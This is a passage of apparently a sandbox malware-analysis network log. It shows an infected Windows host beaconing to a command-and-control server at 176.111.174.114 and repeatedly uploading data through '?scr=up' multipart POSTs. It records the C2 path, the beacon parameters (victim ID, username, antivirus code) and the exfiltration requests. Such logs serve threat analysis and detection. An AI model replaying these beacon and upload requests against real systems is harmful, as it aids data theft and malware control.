Content-Type: application/x-www-form-urlencoded
Host: 176.111.174.114
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
391 | 192.168.2.4 | 49984 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:13.472501993 CEST | 11167 | OUT | POST //Hnq8vS/index.php?scr=up HTTP/1.1
Host: 176.111.174.114
User-Agent: Uploador
Content-Type: multipart/form-data; boundary=152138533219.jpg
Connection: Keep-Alive
Content-Length: 227171


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
392 | 176.111.174.114 | 80 | 192.168.2.4 | 49983 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:13.557121992 CEST | 11167 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 21:00:13 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 6
Content-Type: text/html; charset=UTF-8
Data Raw: 3c 63 3e 3c 64 3e
Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
393 | 192.168.2.4 | 49985 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:13.771451950 CEST | 11355 | OUT | POST /Hnq8vS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.111.174.114
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
394 | 176.111.174.114 | 80 | 192.168.2.4 | 49985 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:13.874295950 CEST | 11382 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 21:00:13 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 6
Content-Type: text/html; charset=UTF-8
Data Raw: 3c 63 3e 3c 64 3e
Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
395 | 176.111.174.114 | 80 | 192.168.2.4 | 49984 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:13.944132090 CEST | 11383 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Apr 2021 21:00:13 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session ID: 396 | Source IP: 192.168.2.4 | Source Port: 49986 | Destination IP: 176.111.174.114 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp: Apr 28, 2021 23:00:14.087088108 CEST | kBytes transferred: 11384 | Direction: OUT | Data:
                                                                                                                                          POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID: 397 | Source IP: 176.111.174.114 | Source Port: 80 | Destination IP: 192.168.2.4 | Destination Port: 49986 | Process: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp: Apr 28, 2021 23:00:14.186113119 CEST | kBytes transferred: 11384 | Direction: IN | Data:
                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:14 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID: 398 | Source IP: 192.168.2.4 | Source Port: 49988 | Destination IP: 176.111.174.114 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp: Apr 28, 2021 23:00:14.397738934 CEST | kBytes transferred: 11385 | Direction: OUT | Data:
                                                                                                                                          POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID: 399 | Source IP: 176.111.174.114 | Source Port: 80 | Destination IP: 192.168.2.4 | Destination Port: 49988 | Process: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp: Apr 28, 2021 23:00:14.500417948 CEST | kBytes transferred: 11385 | Direction: IN | Data:
                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:14 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49750 | Destination IP: 176.111.174.114 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp: Apr 28, 2021 22:59:10.222388029 CEST | kBytes transferred: 4389 | Direction: OUT | Data:
                                                                                                                                          POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID: 40 | Source IP: 192.168.2.4 | Source Port: 49768 | Destination IP: 176.111.174.114 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp: Apr 28, 2021 22:59:16.981093884 CEST | kBytes transferred: 4541 | Direction: OUT | Data:
                                                                                                                                          POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID: 400 | Source IP: 192.168.2.4 | Source Port: 49989 | Destination IP: 176.111.174.114 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp: Apr 28, 2021 23:00:14.712035894 CEST | kBytes transferred: 11386 | Direction: OUT | Data:
                                                                                                                                          POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID: 401 | Source IP: 176.111.174.114 | Source Port: 80 | Destination IP: 192.168.2.4 | Destination Port: 49989 | Process: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp: Apr 28, 2021 23:00:14.812351942 CEST | kBytes transferred: 11386 | Direction: IN | Data:
                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:14 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID: 402 | Source IP: 192.168.2.4 | Source Port: 49990 | Destination IP: 176.111.174.114 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp: Apr 28, 2021 23:00:15.050785065 CEST | kBytes transferred: 11387 | Direction: OUT | Data:
                                                                                                                                          POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID: 403 | Source IP: 176.111.174.114 | Source Port: 80 | Destination IP: 192.168.2.4 | Destination Port: 49990 | Process: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp: Apr 28, 2021 23:00:15.152688026 CEST | kBytes transferred: 11387 | Direction: IN | Data:
                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:15 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID: 404 | Source IP: 192.168.2.4 | Source Port: 49992 | Destination IP: 176.111.174.114 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp: Apr 28, 2021 23:00:15.367641926 CEST | kBytes transferred: 11388 | Direction: OUT | Data:
                                                                                                                                          POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID: 405 | Source IP: 176.111.174.114 | Source Port: 80 | Destination IP: 192.168.2.4 | Destination Port: 49992 | Process: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp: Apr 28, 2021 23:00:15.470993996 CEST | kBytes transferred: 11388 | Direction: IN | Data:
                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:15 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID: 406 | Source IP: 192.168.2.4 | Source Port: 49993 | Destination IP: 176.111.174.114 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp: Apr 28, 2021 23:00:15.675512075 CEST | kBytes transferred: 11389 | Direction: OUT | Data:
                                                                                                                                          POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID: 407 | Source IP: 176.111.174.114 | Source Port: 80 | Destination IP: 192.168.2.4 | Destination Port: 49993 | Process: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp: Apr 28, 2021 23:00:15.775217056 CEST | kBytes transferred: 11389 | Direction: IN | Data:
                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:15 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID: 408 | Source IP: 192.168.2.4 | Source Port: 49994 | Destination IP: 176.111.174.114 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp: Apr 28, 2021 23:00:15.991588116 CEST | kBytes transferred: 11390 | Direction: OUT | Data:
                                                                                                                                          POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID: 409 | Source IP: 176.111.174.114 | Source Port: 80 | Destination IP: 192.168.2.4 | Destination Port: 49994 | Process: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp: Apr 28, 2021 23:00:16.090842009 CEST | kBytes transferred: 11390 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:16 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID: 41 | Source IP: 176.111.174.114 | Source Port: 80 | Destination IP: 192.168.2.4 | Destination Port: 49768 | Process: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp: Apr 28, 2021 22:59:17.078310013 CEST | kBytes transferred: 4541 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:17 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID: 410 | Source IP: 192.168.2.4 | Source Port: 49995 | Destination IP: 176.111.174.114 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: Apr 28, 2021 23:00:16.307410955 CEST | kBytes transferred: 11391 | Direction: OUT | Data:
POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID: 411 | Source IP: 176.111.174.114 | Source Port: 80 | Destination IP: 192.168.2.4 | Destination Port: 49995 | Process: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp: Apr 28, 2021 23:00:16.412863970 CEST | kBytes transferred: 11391 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:16 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID: 412 | Source IP: 192.168.2.4 | Source Port: 49996 | Destination IP: 176.111.174.114 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: Apr 28, 2021 23:00:16.564857006 CEST | kBytes transferred: 11405 | Direction: OUT | Data:
POST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227171


Session ID: 413 | Source IP: 192.168.2.4 | Source Port: 49997 | Destination IP: 176.111.174.114 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: Apr 28, 2021 23:00:16.634388924 CEST | kBytes transferred: 11405 | Direction: OUT | Data:
POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID: 414 | Source IP: 176.111.174.114 | Source Port: 80 | Destination IP: 192.168.2.4 | Destination Port: 49997 | Process: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp: Apr 28, 2021 23:00:16.739522934 CEST | kBytes transferred: 11433 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:16 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID: 415 | Source IP: 192.168.2.4 | Source Port: 49998 | Destination IP: 176.111.174.114 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: Apr 28, 2021 23:00:16.944256067 CEST | kBytes transferred: 11593 | Direction: OUT | Data:
POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID: 416 | Source IP: 176.111.174.114 | Source Port: 80 | Destination IP: 192.168.2.4 | Destination Port: 49998 | Process: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp: Apr 28, 2021 23:00:17.043406963 CEST | kBytes transferred: 11621 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:17 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
417 | 176.111.174.114 | 80 | 192.168.2.4 | 49996 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:17.047816038 CEST | 11622 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:16 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
418 | 192.168.2.4 | 50000 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:17.258733034 CEST | 11623 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
419 | 176.111.174.114 | 80 | 192.168.2.4 | 50000 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:17.363420963 CEST | 11624 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:17 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
42 | 192.168.2.4 | 49769 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:17.284667015 CEST | 4542 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
